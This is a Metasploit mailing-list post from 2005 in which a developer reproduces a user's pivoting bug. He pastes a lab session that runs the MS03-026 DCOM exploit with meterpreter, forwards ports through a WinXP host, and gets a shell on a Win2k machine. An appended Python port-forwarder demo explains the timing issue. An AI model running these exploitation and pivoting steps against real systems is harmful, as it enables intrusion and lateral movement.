Metasploit mailing list archives
use of meterpreter (copy for the list )
From: mmiller at hick.org (mmiller at hick.org)
Date: Wed, 20 Apr 2005 02:20:02 -0500
On Wed, Apr 20, 2005 at 08:01:13AM +0200, Thomas Werth wrote:
> Using single portforward exploitation works. (I didn't use a 3rd party tool; instead I used reverse exploitation direct to the attacking host.) I hope you'll find that bug; if I can help, send me a "special" version and I'll supply detailed output.
I tried to reproduce this tonight and wasn't successful. In my test network I had to create an SSH tunnel to forward the exploitation to the initial box, but that shouldn't factor into this issue. Here's the way things were set up:

SSH tunnels:
------------
127.0.0.1:9000 forwarded to 192.168.64.128:135 (WinXP proxy)
127.0.0.1:4444 forwarded to 192.168.64.128:4444 (WinXP proxy)

Meterpreter tunnels:
127.0.0.1:5000 forwarded to 192.168.64.132:135 (Win2k behind WinXP)
127.0.0.1:5001 forwarded to 192.168.64.132:5001 (Win2k behind WinXP)

In my test network I was unable to communicate directly with the Win2k box, so I had to go through the WinXP box (via meterpreter).

Metasploit instance #1:
-----------------------
msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026(win32_bind_meterpreter) > set
LPORT: 4444
PAYLOAD: win32_bind_meterpreter
RHOST: 127.0.0.1
RPORT: 8000
msf msrpc_dcom_ms03_026(win32_bind_meterpreter) > exploit
[*] Starting Bind Handler.
[*] Connected to REMACT with group ID 0x6836
[*] Got connection from 127.0.0.1:57312 <-> 127.0.0.1:4444
[*] Sending Stage (2834 bytes)
[*] Sleeping before sending dll.
[*] Uploading dll to memory (69643), Please wait...
[*] Upload completed

meterpreter>
[ -= connected to =- ]
[ -= meterpreter server =- ]
[ -= v. 00000500 =- ]

meterpreter> use -m Net
loadlib: Loading library from 'ext556839.dll' on the remote machine.
meterpreter>
loadlib: success.
meterpreter> portfwd -a -l 5000 -h 192.168.64.132 -p 135
portfwd: Successfully created local listener on port 5000.

... wait for instance #2 to display 'Connected to REMACT...' ...

meterpreter> portfwd -a -l 5001 -h 192.168.64.132 -p 5001
portfwd: Successfully created local listener on port 5001.
meterpreter>

Metasploit instance #2:
-----------------------
msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026(win32_bind) > set RHOST 127.0.0.1
RHOST -> 127.0.0.1
msf msrpc_dcom_ms03_026(win32_bind) > set RPORT 5000
RPORT -> 5000
msf msrpc_dcom_ms03_026(win32_bind) > set LPORT 5001
LPORT -> 5001
msf msrpc_dcom_ms03_026(win32_bind) > set
LPORT: 5001
PAYLOAD: win32_bind
RHOST: 127.0.0.1
RPORT: 5000
msf msrpc_dcom_ms03_026(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Connected to REMACT with group ID 0xba20

... created portfwd on 5001 in instance #1 ...

[*] Got connection from 127.0.0.1:40577 <-> 127.0.0.1:5001

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>

As far as I can tell this seems to be nearly (if not exactly) the same thing as what you tried, so I'm not sure why you would be having a different experience than that which I'm having. My only guess is that you are creating the connection handler port forward too soon, thus causing the bind handler to establish before the exploit actually finishes.

I figure we should probably take this thread off-list soon as I imagine people are probably tired of seeing our spam :)

Let me know if the above output helps at all...
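The ordering guess at the end of the message above (a port forward for the connection handler created too early lets the bind handler "connect" before anything is listening at the far end) can be reproduced with a small relay. The following Python is an added example written for this archive page; it is not Metasploit or meterpreter code. It models `portfwd -a -l <lport> -h <host> -p <rport>` as a plain TCP relay on 127.0.0.1, with a constructed echo service standing in for the forwarded target; the ports 15000 and 15001 are arbitrary choices. Like the real listener, the relay accepts the local client first and only then connects onward, so when the target is not yet up the client sees a successful TCP connect followed by an immediate close rather than a connection failure, which is exactly the symptom that makes a handler appear connected too soon.

```python
"""Added example (not from the mailing-list thread): a minimal TCP port
forwarder modelled on meterpreter's `portfwd -a -l <lport> -h <host> -p <rport>`,
used to show why a forward created before its target is listening fools a
handler that treats a completed TCP accept as "connected".

Everything runs on 127.0.0.1 with constructed test servers; no host or port
from the thread is used.
"""
import asyncio


async def _pipe(reader, writer):
    # Copy bytes in one direction until EOF, then half-close the writer so the
    # other direction can still drain (a full close here could lose data).
    while data := await reader.read(4096):
        writer.write(data)
        await writer.drain()
    if writer.can_write_eof():
        writer.write_eof()


async def start_forwarder(lport, host, rport):
    """Listen on 127.0.0.1:lport; relay each accepted connection to host:rport.

    The local client is accepted *before* the onward connection exists. If
    host:rport is not listening yet, the client is accepted and then dropped.
    """
    async def handle(local_reader, local_writer):
        try:
            remote_reader, remote_writer = await asyncio.open_connection(host, rport)
        except OSError:
            local_writer.close()  # target not up: accepted, then dropped
            return
        try:
            await asyncio.gather(
                _pipe(local_reader, remote_writer),
                _pipe(remote_reader, local_writer),
            )
        finally:
            local_writer.close()
            remote_writer.close()

    return await asyncio.start_server(handle, "127.0.0.1", lport)


async def start_echo_server(port):
    """Constructed stand-in for the service behind the pivot (echoes bytes)."""
    async def handle(reader, writer):
        await _pipe(reader, writer)
        writer.close()
    return await asyncio.start_server(handle, "127.0.0.1", port)


async def _through_forwarder(lport, payload):
    # Act as the local client: send payload, half-close, read until EOF.
    reader, writer = await asyncio.open_connection("127.0.0.1", lport)
    try:
        writer.write(payload)
        await writer.drain()
        writer.write_eof()
        return await reader.read()
    except ConnectionError:
        return b""  # peer reset the connection after accepting it
    finally:
        writer.close()


def demo(lport=15000, rport=15001):
    """Return (reply with target listening, reply with target absent)."""
    async def run():
        fwd = await start_forwarder(lport, "127.0.0.1", rport)
        # Case 1: target already listening -> bytes round-trip through the pivot.
        echo = await start_echo_server(rport)
        up = await _through_forwarder(lport, b"hello")
        echo.close()
        await echo.wait_closed()
        # Case 2: forward exists but the target does not -> the local client's
        # connect() succeeds, then it gets EOF with no data. A handler that
        # keys on the accept alone reports "connected" here.
        down = await _through_forwarder(lport, b"hello")
        fwd.close()
        await fwd.wait_closed()
        return up, down
    return asyncio.run(run())


if __name__ == "__main__":
    print(demo())
```

The second element of the returned pair is the "accepted, then dropped" case: from the client side it is indistinguishable from a live connection until the first read, which is why a forward for the handler port should be created only once the far end is actually listening.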